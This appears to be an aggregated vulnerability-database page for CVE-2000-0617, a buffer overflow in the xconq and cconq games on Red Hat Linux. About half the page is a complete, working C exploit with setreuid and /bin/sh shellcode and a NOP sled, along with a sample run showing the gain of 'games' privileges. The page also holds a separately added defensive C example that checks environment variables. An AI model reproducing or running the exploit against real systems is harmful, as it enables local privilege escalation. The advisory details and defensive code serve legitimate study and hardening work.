CVE-2000-0617
CVSS 4.6
Published: 2000-06-22 00:00:00
Revised: 2008-09-10 15:05:12

[Original] Buffer overflow in xconq and cconq game programs on Red Hat Linux allows local users to gain additional privileges via long USER environmental variable.


[CNNVD] xconq multiple buffer overflow vulnerability (CNNVD-200006-095)

Red Hat Linux's xconq and cconq game programs contain a buffer overflow vulnerability. A local user can gain additional privileges via an overly long USER environment variable.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to system files being modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0617
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0617
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-095
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2000-06/0222.html
(VENDOR_ADVISORY)  BUGTRAQ  20000622 RHL 6.2 xconq package - overflows yield gid games

- Vulnerability information

xconq multiple buffer overflow vulnerability
Medium severity, buffer overflow
2000-06-22 00:00:00 2005-10-20 00:00:00
Local
Red Hat Linux's xconq and cconq game programs contain a buffer overflow vulnerability. A local user can gain additional privileges via an overly long USER environment variable.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (20093)

Stanley T. Shebs Xconq 7.2.2 Buffer Overflow Vulnerabilities in xconq (EDBID:20093)
linux local
2000-06-22 Verified
0 V9
N/A
source: http://www.securityfocus.com/bid/1495/info

Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the USER environment variables. The Redhat Linux Xconq package installs the game with SGID 'games' privileges allowing an attacker to compromise the local 'games' group. 

/* (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org].  this
    will give you uid=games on systems with xconq.  this exploit was slightly
    more work than i thought it was going to be.  i originally wrote this
    exploit for the -g parameter.  but, via the -g parameter you must have a
    display.  via this -L parameter you do not need a display, but it is much
    more exact.  in this method you have to fill the XCONQCONFIG environmental
    variable to a certain point to be able to overwrite the eip via the -L
    parameter.  (64 bytes is more than enough).  i also needed to modify some
    shellcode for this.  all in all, too much work for what it is worth.

    example(test usage):
------------------------------------------------------------------------------
bash# echo id|(id;cc xxconq.c -o xxconq;./xxconq -5000 0 20 507)
fakehalo: uid:1000 gid:100. [euid:1000 egid:100]
[ (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]. ]
*** [data]: addr: 0xbffffdc4, offset: -5000, alignment: 0, uid: 20, cap: 507.
*** [data]: sizeof(bofeip): 512, sizeof(env): 4096, sizeof(push): 64, nop=3579.

              Welcome to X11 Xconq version 7.4.1 (Dec 2000)

Xconq is free software and you are welcome to distribute copies of it
under certain conditions; type "o copying" to see the conditions.
There is absolutely no warranty for Xconq; type "o warranty" for details.
fakehalo: uid:20 gid:100. [euid:20 egid:100]
bash#
------------------------------------------------------------------------------

    note: built and tested on slackware.  some other overflowable functions i
          will mention are the -g parameter and the XCONQLIB environmental
          variable,  both of those overflows require a display to exploit.
          this program also has an odd usage of setuid(); in it to drop its
          privileges -- making it possible to break.  and yes, i squished the
          code together on purpose.  why? i am a *x80 resolution kinda guy :/.
*/
#include <stdio.h>                      // printf()
#include <stdlib.h>                     // atoi(), exit(), setenv()
#include <string.h>                     // strcmp(), strlen(), memcpy(), memset(), strrchr()
#include <unistd.h>                     // execl()
#define PATH "/usr/local/bin/xconq"     // path to xconq7.4.1.
#define DEFAULT_ALIGN 0                 // generic alignment.
#define DEFAULT_OFFSET -5000            // generic offset. (from bufsize)
#define DEFAULT_UID 20                  // user id of games.
#define DEFAULT_CAP 507                 // exact buffer cut off point.
#define FILLER 0x78                     // filling character, for misc use.
static char exec[]= // setreuid()+exec(): v9@fakehalo.org.
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"
"\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"
"\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01";
// i386 only: leaves the current %esp in %eax, which is the return register.
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bofeip[512],env[4096],push[64];int i,offset,align,uid,cap;long ret;
 printf("[ (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]"
 ". ]\n");
 if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){
  printf("*** [syntax]: %s [offset] [alignment] [user id] [capoff buffer value"
  "].\n",argv[0]);
  printf("*** [required]: argument alignment value must be: 0-3.\n");
  printf("*** [required]: argument user id value must be: 1-255.\n");
  printf("*** [required]: argument cap value must be: 1-%d.\n",sizeof(bofeip));
  exit(0);
 }
 if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
 if(argc>2){
  if(atoi(argv[2])>3||atoi(argv[2])<0){
   printf("*** [error]: ignored argument alignment value: %s. (use 0-3)\n",
   argv[2]);align=DEFAULT_ALIGN;
  }
  else{align=atoi(argv[2]);}
 }
 else{align=DEFAULT_ALIGN;}
 if(argc>3){
  if(atoi(argv[3])<1||atoi(argv[3])>255){
   printf("*** [error]: ignored argument uid value: %s. (use 1-255)\n",
   argv[3]);uid=DEFAULT_UID;
  }
  else{uid=atoi(argv[3]);}
 }
 else{uid=DEFAULT_UID;}
 if(argc>4){
  if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
   printf("*** [error]: ignored argument cap value: %s. (use 1-%d)\n",argv[4],
   sizeof(bofeip));cap=DEFAULT_CAP;
  }
  else{cap=atoi(argv[4]);}
 }
 else{cap=DEFAULT_CAP;}
 ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
 for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long *)&bofeip[i]=ret;}
 bofeip[cap]=0x0;
 for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}
 exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
 env[(i+strlen(exec))]=0x0;printf("*** [data]: addr: 0x%lx, offset: %d, alignm"
 "ent: %d, uid: %d, cap: %d.\n*** [data]: sizeof(bofeip): %d, sizeof(env): %d,"
 " sizeof(push): %d, nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),
 sizeof(env),sizeof(push),(strlen(env)-strlen((char *)strrchr(env,0x90))+1));
 setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));
 push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
 if(execl(PATH,PATH,"-L",bofeip,0)){
  printf("*** [error]: could not execute %s properly.\n",argv[0]);
  exit(-1);
 }
}
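An added example, not the advisory's or the exploit author's code, showing the defensive counterpart to the note above: a check over the environment variables this page names (USER, DISPLAY, XCONQCONFIG, XCONQLIB) before they reach fixed stack buffers, and a group-privilege drop that verifies itself instead of trusting a lone setuid() call. The 255-byte limit, the function names and the verdict codes are assumptions.

```c
/* Added example (not the advisory's or the exploit's code): a pre-exec check
 * over the environment variables this page names and an SGID drop that
 * verifies itself. Limit, names and verdict codes are assumptions. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE            /* setenv(), setregid() on glibc */
#endif
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define ENV_MAXLEN 255             /* assumed bound; real names are far shorter */

enum env_verdict { ENV_OK = 0, ENV_TOO_LONG = 1, ENV_BINARY = 2 };

/* Classify one value: refuse anything longer than the bound (a fixed stack
 * buffer cannot hold it) and anything with non-printable bytes (a NOP sled or
 * shellcode never looks like a user or display name). Unset is fine. */
enum env_verdict check_env_value(const char *value, size_t maxlen) {
    if (value == NULL) return ENV_OK;
    size_t n = strlen(value);
    if (n > maxlen) return ENV_TOO_LONG;
    for (size_t i = 0; i < n; i++)
        if (!isprint((unsigned char)value[i])) return ENV_BINARY;
    return ENV_OK;
}

static const char *const WATCHED[] = { "USER", "DISPLAY", "XCONQCONFIG", "XCONQLIB", NULL };

/* Walk the live environment; return the first offending variable name, or
 * NULL when every watched variable is absent or harmless. */
const char *first_bad_env(void) {
    for (int i = 0; WATCHED[i] != NULL; i++)
        if (check_env_value(getenv(WATCHED[i]), ENV_MAXLEN) != ENV_OK)
            return WATCHED[i];
    return NULL;
}

/* Drop a set-group-id bit before any input is parsed and confirm the drop
 * took, instead of trusting a lone setuid() call as the exploit note
 * describes. Returns 0 on success, -1 if the process is still privileged. */
int drop_sgid(void) {
    gid_t rgid = getgid();
    if (setregid(rgid, rgid) != 0) return -1;
    return getegid() == rgid ? 0 : -1;
}

int main(void) {
    if (drop_sgid() != 0) return 1;
    return first_bad_env() != NULL ? 2 : 0;  /* refuse a suspicious environment */
}
```

A wrapper built this way exits non-zero before the game ever parses its environment, which is also the point at which an alert on the offending variable name can be logged.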

- Vulnerability information

84633
Red Hat Linux xconq Multiple Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- Vulnerability description

Red Hat Linux is prone to an overflow condition. The xconq and cconq game programs fail to properly sanitize user-supplied input resulting in a buffer overflow. With a specially crafted USER environment variable, a local attacker can potentially cause a denial of service or execute arbitrary code.

- Timeline

2000-06-22 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Buffer Overflow Vulnerabilities in xconq
Boundary Condition Error 1495
No Yes
2000-06-22 12:00:00 2009-07-11 02:56:00
This vulnerability was first reported in a message to Bugtraq on June 22, 2000 by Stan Bubrouski <satan@fastdial.net>.

- Affected program versions

Stanley T. Shebs Xconq 7.2.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0

- Vulnerability discussion

Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the USER environment variables. The Redhat Linux Xconq package installs the game with SGID 'games' privileges allowing an attacker to compromise the local 'games' group.

- Exploit

This exploit was contributed by Chris Sharp <v9@fakehalo.org> on December 25, 2000.

- Solution

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
